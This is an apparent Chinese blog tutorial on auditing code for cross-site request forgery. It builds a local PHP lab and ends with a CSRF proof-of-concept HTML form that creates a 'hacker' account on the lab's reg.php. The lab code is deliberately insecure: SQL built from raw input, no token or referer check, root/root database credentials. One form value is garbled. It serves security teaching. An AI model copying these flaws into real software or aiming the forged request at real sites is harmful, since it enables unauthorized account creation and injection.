一个网络安全学习爱好者在学习过程中记录下的笔记,希望在CSDN能和大家一起成长,学习,分享,进步,下面分享的是代码审计中跨站请求伪造,希望对入门代码审计的朋友们有所帮助,大神有兴趣看看即可,勿喷感谢,同时也欢迎各位师傅私聊交流学习。文章有所参考,也感谢教授我网安知识的师父们,感谢出生在这个互联网时代,知识触手可及。
CSRF
跨站请求伪造
原理:攻击者在用户未察觉的情况下凭借用户的身份向存在CSRF的网站发起恶意HTTP请求。
挖掘思路:
1、后台管理,会员中心、用户添加、资料修改等
2、被引用的文件没有验证token和referer
案例:
用户登录模块login.html:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>用户登录</title>
</head>
<body>
<form action="login.php" method="post">
账号:<input type="text" name="username"></br>
密码:<input type="password" name="password"></br>
<input type="submit" value="点击登录" name="login">
</form>
</body>
</html>
动态脚本语言接收输入的用户名密码并登录login.php:
<?php
header("content-type:text/html;charset=utf-8");
if(!isset($_POST['login'])) {
exit('illegal access!');
}else{
$username = $_POST['username'];
$password = $_POST['password'];
include ('conn.php');
$sql = "SELECT * FROM user WHERE username='$username' and password='$password';";
$result = mysql_query($sql);
if($row = mysql_fetch_array($result)) {
session_start();
$_SESSION['username'] = $row['username'];
echo $_SESSION['username']. ",welcome!";
echo '<a href="reg.html">添加用户</a>';
}
}
存在csrf的用户注册模块reg.html:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>会员注册</title>
</head>
<body>
<form action="reg.php" method="post">
用户注册<br >
用户名:<input type="text" name="username"><br >
密码:<input type="password" name="password"><br >
<input type="submit" name="submit" value="添加用户">
</form>
</body>
</html>
动态脚本语言接收输入的用户名密码并登录reg.php:
<?php
header("content-type:text/html;charset=utf-8");
session_start();
if(!isset($_SESSION['username'])) {
echo '<script>alert("please login again!")</script>';
exit();
}else{
$username = $_POST['username'];
$password = $_POST['password'];
include ('conn.php');
$sql = "INSERT INTO csrf VALUES ($username,$password)";
$result = mysql_query($sql);
if($result) {
echo '<script>alert("register success!")</script>';
}else{
echo '<script>alert("register fail!")</script>';
}
}
数据库连接文件conn.php:
<?php
$conn = mysql_connect("localhost","root","root");
mysql_select_db("csrf",$conn);
使用reg.html添加用户时需要登录,因为reg.php会检验是否存在username的会话
我们在reg.html登录并抓包构造好POC,csrf.html:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/reg.php" method="POST">
<input type="hidden" name="username" value="hacker" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="submit" value="�·»�Š �”¨�ˆ·" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
诱使用户点击csrf.html
流程示意图: